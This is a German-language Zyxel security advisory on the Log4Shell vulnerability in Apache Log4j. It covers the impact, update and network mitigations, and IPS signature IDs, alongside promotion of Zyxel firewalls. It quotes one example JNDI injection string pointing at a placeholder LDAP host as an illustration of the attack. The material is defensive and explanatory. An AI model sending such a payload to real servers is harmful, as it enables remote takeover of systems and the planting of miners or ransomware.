Guard against Log4Shell

Schutz vor Log4Shell

Anfälliges log4j-Paket

Log4j ist ein Open-Source-Projekt, das häufig für die Protokollierung in JAVA verwendet wird. In Log4j wurde eine Remote Code Injection in der Version zwischen 2.x.x und 2.14.x gefunden. (Ein neuer Exploit für log4j, CVE-2021-45046, wurde allerdings auch in 2.15 gefunden. Wir empfehlen ein Update auf die Version 2.17). Die Schwachstelle erlaubt Angreifern, einen speziell geformten Befehl zu senden, um die Remote-Shell (Log4shell) einfach zu erhalten.

Auswirkungen

Diese Sicherheitslücke erhielt den höchsten Score (10) in CVSS (Common Vulnerability Scoring System), da das log4j-Paket weit verbreitet ist und die Sicherheitslücke aus der Ferne ausgenutzt werden kann. Wenn der Server verwundbar ist, können Angreifer Befehle (wie ${jndi:ldap:// example.com/a}) an das log4j-Paket senden und die Shell dazu bringen, den Server zu übernehmen. Falls der Host gekapert wurde, kann er als Bot bzw. Miner verwendet werden, oder Ihre wichtigen Dateien werden möglicherweise durch Ransomware verschlüsselt.

Produkte gegen die Log4Shell-Schwachstelle

Zyxel ist sich der RCE-Schwachstellen (Remote Code Execution) in Apache Log4j bewusst und bestätigt, dass KEINE seiner Sicherheitsprodukte betroffen sind [1]. Die Firewalls der ATP-/USG FLEX-Serien von Zyxel bieten mehrschichtigen Schutz, um Sie vor Angriffen zu bewahren.

Eindämmung von potenziellen Schäden

Auf dem Host: Es wird empfohlen, auf die neueste Version von Apache Log4j (>=2.17.0) zu aktualisieren.

Im Netzwerk:

  • Um die Angriffsfläche zu verringern, sollten Sie anfällige Anwendungen nur dann im Internet veröffentlichen, wenn dies unbedingt erforderlich ist. Nutzen Sie VPN-Technologie für den Fernzugriff auf die Anwendungen.
  • Aktualisieren Sie auf die neueste Version der IPS-Signatur und aktivieren Sie dann die IPS-Funktion zum Schutz Ihres Hosts. Wenn Ihr Host SSL/TLS-Übertragung verwendet, sollten Sie zur weiteren Erkennung auch die SSL Inspection aktivieren. Wenn der Angriff von einer bösartigen IP-Adresse ausgeht, schützt Sie die IP Reputation-Funktion vor Angriffen von dieser IP-Adresse.
  • Durch die Aktivierung von DNS-Filter, URL-Filter, Content-Filter, Anti-Virus und Sandbox kann die Angriffskette unterbrochen werden, um weitere Infektionen zu vermeiden.

Um mehr über das Sicherheitsangebot von Zyxel zu erfahren, klicken Sie auf „Mehr erfahren“:

Mehr erfahren

Informationen zur Signatur

ATP-/USGFLEX-Serien:

v4.0.x.20211217.0

Die Signatur-IDs 131026, 131027 und 131028 werden für CVE-2021-44228 verwendet.

# Die Signatur-IDs 131029 und 131030 werden für CVE-2021-45046 verwendet.

Mehr Erfahren >

Referenz

[1] Zyxel-Sicherheitsempfehlung für Apache Log4j RCE-Schwachstelle (in englischer Sprache)

Tag